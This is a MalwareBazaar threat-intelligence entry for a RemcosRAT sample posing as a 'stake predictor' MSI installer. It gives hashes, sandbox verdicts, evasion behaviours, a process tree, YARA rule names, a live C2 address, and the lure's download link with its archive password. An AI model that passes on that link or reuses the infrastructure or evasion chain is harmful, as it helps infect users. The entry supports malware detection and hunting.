MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RemcosRAT


Vendor detections: 11


Intelligence 11 IOCs YARA 9 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
SHA3-384 hash: 0c9bf8878d4bc3c174538f0164206c623b47998746659221f83c58b07f333be2b9f9b25b507b98ec35da0b7dbd0a2806
SHA1 hash: fd9037a16f327a64f8b2fd8ff9f6664ae307ca39
MD5 hash: 028578212baa7456aae40d4bdb5792e5
humanhash: fifteen-oklahoma-hawaii-island
File name:LauncherPred8.3.389 stablesetup.msi
Download: download sample
Signature RemcosRAT
Create hunting rule
File size:3'232'256 bytes
First seen:2024-11-30 00:20:43 UTC
Last seen:Never
File type:Microsoft Software Installer (MSI) msi
MIME type:application/x-msi
ssdeep 49152:muoukMo27Epq0n8Toc4Ur8r6F5mCmR+Ov0Rn0rItYcuwwERO9qZFTvqPvO6Ezvsk:1Yn8ToWo6AvAYcuwr9qrn
Threatray 4'630 similar samples on MalwareBazaar
TLSH T122E5AF11B98AC533E67D4176E968FB2B247ABFE2073184DB63E8398E4D708C15275F12
TrID 80.0% (.MSI) Microsoft Windows Installer (454500/1/170)
10.7% (.MST) Windows SDK Setup Transform script (61000/1/5)
7.8% (.MSP) Windows Installer Patch (44509/10/5)
1.4% (.) Generic OLE2 / Multistream Compound (8000/1)
Magika msi
Reporter aachum
Tags:msi RemcosRAT


Avatar
iamaachum
https://telegra.ph/stake-predictor-11-29 => https://app.box.com/s/qulsz9aubfz07k4rz85i7ld4jz6nr4i0 (Password 1234)

Remcos C2: 185.157.162.126:1995

Intelligence

File Origin
# of uploads :
1
# of downloads :
109
Origin country :
ES ES
Vendor Threat Intelligence
Verdict:
Malicious
Score:
95.7%
Link:
https://cyber-fortress.com/docs/result/index.php?id=674a5b7004c232bff3b4daaf
Tags:
shellcode dropper remcos virus
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
anti-vm cmd cscript fingerprint lolbin msiexec remote timeout wix
Link:
https://www.filescan.io/uploads/674a5a6ec8e92ec40d9282ff/reports/01e63207-ddf6-4b2d-93c1-5a08641daff8/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
Result
Threat name:
Clipboard Hijacker, MicroClip, Remcos
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1565485
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Injects a PE file into a foreign processes
Installs a MSI (Microsoft Installer) remotely
Machine Learning detection for dropped file
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Query firmware table information (likely to detect VMs)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Clipboard Hijacker
Yara detected MicroClip
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565485 Sample: LauncherPred8.3.389 stables... Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 123 185.157.162.126 OBE-EUROPEObenetworkEuropeSE Sweden 2->123 125 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->125 127 3 other IPs or domains 2->127 135 Found malware configuration 2->135 137 Malicious sample detected (through community Yara rule) 2->137 139 Antivirus detection for dropped file 2->139 141 13 other signatures 2->141 13 msiexec.exe 23 49 2->13         started        17 msiexec.exe 18 42 2->17         started        19 RaftelibeGasrss.exe 2->19         started        22 4 other processes 2->22 signatures3 process4 dnsIp5 129 github.com 20.233.83.145, 443, 49734 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->129 131 raw.githubusercontent.com 185.199.108.133, 443, 49736 FASTLYUS Netherlands 13->131 107 C:\Windows\Installer\MSID1D3.tmp, PE32 13->107 dropped 109 C:\Windows\Installer\MSID1B3.tmp, PE32 13->109 dropped 111 C:\Windows\Installer\MSID183.tmp, PE32 13->111 dropped 119 6 other files (4 malicious) 13->119 dropped 24 Updwork.exe 13->24         started        28 EHttpSrv.exe 13->28         started        30 msiexec.exe 13->30         started        113 C:\Windows\Installer\MSIE0FB.tmp, PE32 17->113 dropped 115 C:\Windows\Installer\MSIE0BC.tmp, PE32 17->115 dropped 117 C:\Windows\Installer\MSIE09B.tmp, PE32 17->117 dropped 121 9 other malicious files 17->121 dropped 32 cmd.exe 1 17->32         started        34 msiexec.exe 17->34         started        143 Writes to foreign memory regions 19->143 145 Allocates memory in foreign processes 19->145 147 Tries to detect virtualization through RDTSC time measurements 19->147 153 3 other signatures 19->153 36 WerFault.exe 19->36         started        133 127.0.0.1 unknown unknown 22->133 149 Potential evasive VBS script found (sleep loop) 22->149 151 Maps a DLL or memory area into another process 22->151 38 cmd.exe 22->38         started        40 cmd.exe 22->40         started        file6 signatures7 process8 file9 101 C:\Users\user\AppData\Local\...\zlib1.dll, PE32 24->101 dropped 161 Antivirus detection for dropped file 24->161 163 Multi AV Scanner detection for dropped file 24->163 165 Writes to foreign memory regions 24->165 175 4 other signatures 24->175 42 WerFault.exe 24->42         started        167 Found API chain indicative of debugger detection 28->167 169 Maps a DLL or memory area into another process 28->169 171 Switches to a custom stack to bypass stack traces 28->171 45 cmd.exe 28->45         started        48 cscript.exe 2 32->48         started        50 conhost.exe 32->50         started        52 timeout.exe 1 32->52         started        60 5 other processes 32->60 173 Query firmware table information (likely to detect VMs) 34->173 103 C:\Users\user\AppData\Local\Temp\taohlye, PE32 38->103 dropped 54 EHttpSrv.exe 38->54         started        56 conhost.exe 38->56         started        58 conhost.exe 40->58         started        signatures10 process11 file12 177 Found API chain indicative of debugger detection 42->177 105 C:\Users\user\AppData\Local\...\ymvguouuwjjha, PE32 45->105 dropped 179 Writes to foreign memory regions 45->179 181 Found hidden mapped module (file has been removed from disk) 45->181 183 Maps a DLL or memory area into another process 45->183 185 Switches to a custom stack to bypass stack traces 45->185 62 EHttpSrv.exe 45->62         started        65 conhost.exe 45->65         started        187 Suspicious powershell command line found 48->187 67 powershell.exe 8 12 48->67         started        189 Found direct / indirect Syscall (likely to bypass EDR) 54->189 signatures13 process14 signatures15 193 Found direct / indirect Syscall (likely to bypass EDR) 62->193 69 wscript.exe 1 67->69         started        72 conhost.exe 67->72         started        process16 signatures17 155 Windows Scripting host queries suspicious COM object (likely to drop second stage) 69->155 157 Installs a MSI (Microsoft Installer) remotely 69->157 159 Wscript called in batch mode (surpress errors) 69->159 74 wscript.exe 1 69->74         started        77 cmd.exe 1 69->77         started        79 cmd.exe 1 69->79         started        81 2 other processes 69->81 process18 signatures19 191 Installs a MSI (Microsoft Installer) remotely 74->191 83 msiexec.exe 74->83         started        85 WMIC.exe 1 77->85         started        87 conhost.exe 77->87         started        89 taskkill.exe 1 79->89         started        91 conhost.exe 79->91         started        93 taskkill.exe 1 81->93         started        95 conhost.exe 81->95         started        97 conhost.exe 81->97         started        process20 process21 99 WmiPrvSE.exe 1 85->99         started       
Score:
83%
Verdict:
Malware
File Type:
ARCHIVE
Link:
https://malprob.io/report/bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449/
Threat name:
Win32.Backdoor.Remcos
Create hunting rule
Status:
Suspicious
First seen:
2024-11-30 00:21:18 UTC
File Type:
Binary (Archive)
Extracted files:
134
AV detection:
8 of 38 (21.05%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=xw3zqahec55vtm4dblt4zglkih6cwvqfspt3khqcicgaml4nireq._file
Verdict:
malicious
Label(s):
remcos
Create hunting rule
Similar samples:
23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
RemcosRAT
6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321
RemcosRAT
b2a1e0e508be9c7546a8af45c72f2032f067ac036f03ec0c8309b368b195a65c
RemcosRAT
e483ca3bc78e49f0ceef3406ea963101fe1d2b08b4bace6945ac9298222b8c37
RemcosRAT
error
RemcosRAT
f5dfa6b5d19d9334c69d24dd98f13cb30badacb6403b03afc47af4e267cbe0c2
RemcosRAT
fc7beeae6b795561f216733b82611c8db1643cc883ded6fbca9c447c7a985358
RemcosRAT
+ 4'620 additional samples on MalwareBazaar
Result
Malware family:
remcos
Create hunting rule
Score:
  10/10
Tags:
family:hijackloader family:remcos botnet:v2 discovery execution loader rat
Link:
https://tria.ge/reports/241130-ancbssymam/
Behaviour
Delays execution with timeout.exe
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Program Files directory
Drops file in Windows directory
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Blocklisted process makes network request
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Use of msiexec (install) with remote resource
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Remcos
Remcos family
Malware Config
C2 Extraction:
185.157.162.126:1995
Verdict:
Malicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/8e9c5ab2-c7b4-4af0-bf7c-ec384f104730
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:DebuggerCheck__API
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Create hunting rule
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Detect_LATAM_MSI_Banker
Create hunting rule
Rule name:NET
Create hunting rule
Author:malware-lu
Rule name:RansomPyShield_Antiransomware
Create hunting rule
Author:XiAnzheng
Description:Check for Suspicious String and Import combination that Ransomware mostly abuse(can create FP)
Rule name:suspicious_msi_file
Create hunting rule
Author:Johnk3r
Description:Detects common strings, DLL and API in Banker_BR

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

RemcosRAT

Microsoft Software Installer (MSI) msi bdb79800e4177b59b3830ae7cc996a41fc2b560593e7b51e02408c062f8d4449

(this sample)

RemcosRAT

Microsoft Software Installer (MSI) msi 6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321

  
Link
https://tria.ge/241130-ajbjpsykbl/
  
Delivery method
Distributed via web download
  
Dropping
SHA256 6ed0c218b751ec93293b5922e783b7a9b147a3c7cd6070022cd707050108d321
  
Dropping
MD5 6f92f923d8f87afe5fe757ff2ff56951
  
Dropping
SHA256 23723f9b4239194a21bf0df559f9e9df8aec1399899346311c09cdcd91a9f1b0
  
Dropping
MD5 183d51767fe58e2bd256688315d25709

Comments